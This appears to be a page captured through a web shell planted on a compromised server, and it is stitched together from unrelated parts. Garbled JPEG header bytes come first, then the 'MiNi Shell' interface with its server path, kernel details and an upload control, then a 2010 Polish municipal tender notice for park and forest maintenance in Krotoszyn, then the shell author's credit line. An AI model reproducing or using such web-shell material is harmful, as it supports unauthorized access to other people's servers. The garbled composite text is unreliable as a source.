JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/345729-N-2010.html

<p class="kh_header"><b>Krotoszyn: Utrzymanie zieleni miejskiej i lasów komunalnych na terenie Krotoszyna w 2011 roku</b><br>
<b>Numer ogłoszenia: 345729 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Krotoszyn , ul. Hugona Kołłątaja 7, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7227454, faks 062 7228251.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni miejskiej i lasów komunalnych na terenie Krotoszyna w 2011 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia stanowi utrzymanie zieleni miejskiej i lasów komunalnych na terenie Krotoszyna w 2011 roku. Zamawiający zapewnia materiał niezbędny do wykonania usług, tj. sadzonki drzew, krzewów, kwiatów sezonowych, nasiona trawy, paliki do drzew, nawozy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w oparciu o art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do wysokości 30 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.30.00-7, 77.20.00.00-2, 90.62.00.00-9, 90.60.00.00-3, 77.23.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla cz. I zamówienia : Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia tj. dysponuje następującym sprzętem : pojazd mechaniczny do wywozu śmieci - 1 szt, kosiarka spalinowa - 2 szt, sprzęt do odśnieżania i posypywania alejek i chodników ( np. ciągnik ogrodniczy z pługiem   do odśnieżania) - 1 szt, podstawowe narzędzia ogrodnicze typu: grabie, łopaty, miotły - 4 komplety.Wykonawca spełni warunek, jeżeli wykaże dysponowanie w/w sprzętem lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia w/w sprzętu (na okres ich udziału w wykonywaniu zamówienia).
Warunek dla cz. II zamówienia : Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia tj. dysponuje następującym sprzętem : środek transportu do przewozu materiałów  - 1 szt., beczkowóz do podlewania roślin - 1 szt, walec ogrodniczy - 1szt, piła spalinowa - 2 szt, podstawowe narzędzia ogrodnicze typu: sekatory, motyczki do pielenia - 5 kompletów, podnośnik koszowy - 1 szt. Wykonawca spełnia warunek, jeżeli dysponuje w/w sprzętem, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia sprzętu na okres wykonywania zamówienia.
Warunek dla cz. III zamówienia : Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia tj. dysponuje następującym sprzętem : środek transportu do wywozu urobku po cięciach drzew i do przewozu materiałów  - 1 szt, piła spalinowa - 2 szt, podstawowe narzędzia ogrodnicze typu: łopaty, grabie - 3 komplety, podnośnik koszowy - 1 szt.Wykonawca spełnia warunek, jeżeli dysponuje w/w sprzętem, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia sprzętu na okres wykonywania zamówienia.
Warunek dla cz. IV zamówienia : Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia tj. dysponuje następującym sprzętem : środek transportu do wywozu drewna  - 1 szt, piła spalinowa - 2 szt.Wykonawca spełnia warunek, jeżeli dysponuje w/w sprzętem, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia sprzętu na okres wykonywania zamówienia.
Ocena spełniania warunku będzie dokonywana w oparciu o kompletność i prawidłowość złożonych oświadczeń i dokumentów określonych w SIWZ ( pkt. IX.B 2 oraz załącznik nr 5) i zostanie dokonana na podstawie treści tych dokumentów według metody : spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dla cz. I zamówienia :Wykonawca dysponuje następującymi osobami:  
a/. kierownik robót, który posiada wykształcenie min. średnie.
b/. pozostały personel: min. trzech pracowników fizycznych.Wykonawca spełnia warunek, jeżeli dysponuje w/w osobami, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób (na okres ich udziału w wykonywaniu zamówienia), mogących wykonywać w/w funkcje.
Warunek dla cz. II zamówienia :Wykonawca dysponuje następującymi osobami:  
a/. kierownik robót, który posiada wykształcenie wyższe ogrodnicze.
b/. pozostały personel: min. czterech pracowników fizycznych, w tym min. jeden z uprawnieniami pilarza.Wykonawca spełnia warunek, jeżeli dysponuje w/w osobami, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób (na okres ich udziału w wykonywaniu zamówienia), mogących wykonywać w/w funkcje.
Warunek dla cz. III zamówienia :Wykonawca dysponuje następującymi osobami:  
a/. kierownik robót, który posiada wykształcenie wyższe ogrodnicze.
b/. pozostały personel: min. dwóch pracowników fizycznych, w tym przynajmniej jednego z uprawnieniami pilarza. Jedna z wykazanych osób powinna posiadać kwalifikacje w zakresie zabezpieczenia, uzupełnienia, rekonstrukcji lub konserwacji parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej. 
Zgodnie z zapisami Rozporządzenia Ministra Kultury z dnia 09.06.2004 r. (Dz.U. Nr 150 poz.1579) kwalifikacje takie posiada osoba, która:
- posiada zaświadczenie kwalifikacyjne w zakresie zabezpieczenia, uzupełnienia, rekonstrukcji lub konserwacji parków zabytkowych lub innego rodzaju zorganizowanej zieleni zabytkowej, lub
- posiada tytuł zawodowy magistra uzyskany po ukończeniu studiów, obejmujących wiadomości w tym zakresie, oraz odbyła po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków ( powyższe potwierdza opinia wojewódzkiego konserwatora zabytków, właściwego dla miejsca położenia zabytku, w którym prace te były wykonywane).
Wykonawca spełnia warunek, jeżeli dysponuje w/w osobami, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób (na okres ich udziału w wykonywaniu zamówienia), mogących wykonywać w/w funkcje.
Warunek dla cz. IV zamówienia :Wykonawca dysponuje następującymi osobami:  
a/. kierownik robót, który posiada  min. średnie leśne wykształcenie.
b/. pozostały personel: min. 2 osoby z uprawnieniami pilarzy. Wykonawca spełnia warunek, jeżeli dysponuje w/w osobami, lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób (na okres ich udziału w wykonywaniu zamówienia), mogących wykonywać w/w funkcje.
Ocena spełniania warunku będzie dokonywana w oparciu o kompletność i prawidłowość złożonych oświadczeń i dokumentów określonych w SIWZ ( pkt. IX.B 1 oraz załącznik nr 4) i zostanie dokonana na podstawie treści tych dokumentów według metody : spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty wymagane w przypadku , gdy Wykonawca wykazując spełnienie warunków udziału w postępowaniu będzie polegać na  potencjale technicznym  i osobach zdolnych do wykonania zamówienia: 1) pisemne zobowiązanie podmiotu (podmiotów) do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające także listę osób, które zostaną przez ten podmiot udostępnione, 2) pisemne zobowiązanie podmiotu (podmiotów) do oddania do dyspozycji potencjału technicznego na okres jego udziału w wykonywaniu zamówienia, zawierające także listę sprzętu, który udostępni.  

2. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik : pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy

3. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa do reprezentowania Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. 
Zmiany przewidziane w umowie mogą być dokonane na wniosek : 
- zamawiającego,
- wykonawcy. 
Warunkiem dokonania zmiany jest złożenie przez stronę inicjującą zmianę wniosku, zawierającego opis zmiany, uzasadnienie zmiany oraz obliczenie kosztów zmiany, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krotoszyn.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Krotoszynie, ul. Kołłątaja 7, 63-700 Krotoszyn, pok. 63.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2010 godzina 10:30, miejsce: Urząd Miejski w Krotoszynie, ul. Kołłątaja 7, 63-700 Krotoszyn, pok. 63.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prace porządkowe na terenach zieleni miejskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1.Zbieranie papierów i nieczystości
2.Opróżnianie koszy wraz z wywozem nieczystości na punkt przeładunkowy przy ul. Ceglarskiej
3.Oczyszczanie stawów w Parku Wojska Polskiego
 (pow. 4.500 m2) z papierów, liści i nieczystości
4.Koszenie trawników na terenie płaskim
5.Akcja zimowa :
- odśnieżanie alejek i chodników,
- posypywanie piaskiem alejek i chodników 
6.Wygrabianie liści w parkach i skwerach wraz z ich wywozem na punkt przeładunkowy przy ul. Ceglarskiej 
7.Zamiatanie alejek w parkach i przy zieleńcach wraz z wywozem śmieci na punkt przeładunkowy przy ul. Ceglarskiej 
8.Naprawa ławek parkowych
9.Malowanie ławek parkowych (bez materiału)
10.Codzienne sprzątanie Rynku przy fontannie
11.Montaż nowych ławek
12.Montaż koszy parkowych
13.Czynności pomocnicze dotyczące prac na terenach zieleni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.30.00-7, 77.20.00.00-2, 90.62.00.00-9, 90.60.00.00-3, 77.23.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Bieżące utrzymanie, modernizacja istniejących, urządzanie nowych terenów zieleni, sadzenie kwiatów, drzewek i krzewów, wycinka i pielęgnacja drzew i krzewów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zamówienia obejmuje:
1.Zakładanie trawników z siewu 
2.Formowanie żywopłotów ze zgrabianiem odciętych odpadów i ich wywozem na punkt przeładunkowy przy ul. Ceglarskiej
3.Odchwaszczanie żywopłotów
4.Sadzenie nowego żywopłotu z wymianą gleby na głęb. 60 cm
5.Palikowanie drzew
6.Cięcie formujące krzewów
7.Przygotowanie kwietników do obsadzeń
8.Sadzenie cebul kwiatowych
9.Wiosenne sadzenie kwiatów 1-rocznych - 20 sztuk na m2
10.Letnie sadzenie kwiatów 1-rocznych - 16 sztuk na m2
11.Podlewanie roślin
12.Pielenie kwiatów,  krzewów i różanek
13.Wycięcie drzewa bez frezowania pnia :
-o do 65 cm,
-o powyżej 65 cm
14.Przesadzanie drzew
15.Frezowanie pnia na głębokość 40 cm po drzewie o :
-o do 65 cm,
-o powyżej 65 cm
16.Formowanie drzew - głogi ( drzewa stare)
17.Prześwietlanie koron drzew wraz z cięciami zachowawczymi - odmładzającymi
18.Formowanie pni i koron młodych drzew liściastych
19.Sadzenie drzew 
20.Sadzenie krzewów
21.Odcinanie odrostów przy pniach drzew
22.Cięcia sanitarne drzew - wycinka posuszu w koronach drzew
23.Nawożenie młodych drzew azofoską 50g/szt.
24.Nawożenie młodych krzewów azofoską 10kg/100 m2
25.Nawożenie trawników azofoską 5 kg/100 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.30.00-7, 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prace wykonywane w parku im. Wojska Polskiego - obiekt zabytkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1.Wycięcie drzewa bez frezowania pnia :
-o do 65 cm,
-o powyżej 65 cm
2.Frezowanie pnia na głębokość 40 cm po drzewie o :
-o do 65 cm,
-o powyżej 65 cm
3.Prześwietlanie koron drzew wraz z cięciami zachowawczymi - odmładzającymi
4.Formowanie pni i koron młodych drzew liściastych
5.Sadzenie drzew 
6.Sadzenie krzewów
7.Cięcia sanitarne drzew - wycinka posuszu w koronach
8.Palikowanie drzew.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.30.00-7, 77.20.00.00-2, 77.23.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Utrzymanie lasów komunalnych zgodnie z: Uproszczonym planem urządzania lasu komunalnego Miasta Krotoszyna na okres 1.01.2009-31.12.2018.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1.Pielęgnacja upraw
2.Czyszczenie wczesne upraw
3.Pozyskanie drewna + zrywka w użytkach przedrębnych (trzebieże późne)
4.Ryczałt za administrowanie lasami
5.Rębnia IC
6.Zalesienie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.30.00-7, 77.20.00.00-2, 77.23.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com